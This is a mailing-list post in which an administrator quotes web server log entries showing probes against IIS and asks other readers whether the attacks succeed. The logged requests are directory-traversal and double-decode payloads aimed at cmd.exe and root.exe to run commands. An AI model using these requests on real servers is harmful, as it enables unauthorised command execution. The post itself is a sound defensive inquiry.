207.225.190.149 -- [14/Jan/2002:10:30:22 -0700]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700]
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700]
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700]
"GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:23 -0700]
"GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 401 3837
207.225.190.149 - - [14/Jan/2002:10:30:25 -0700]
"GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
I kind of bothers me to post these on an open list (apparently
our Web server doesn't need any more "attention") but
I would like to know what everyone thinks of these attacks. My
Web server logged > 2000 of these attacks over the weekend. I'm
pretty sure that attacks are not succeeding, but I've read that
if the "%5c" shows up in the Double Decode attack that the file
traversal is taking place. Thanks.
Jim Grossl
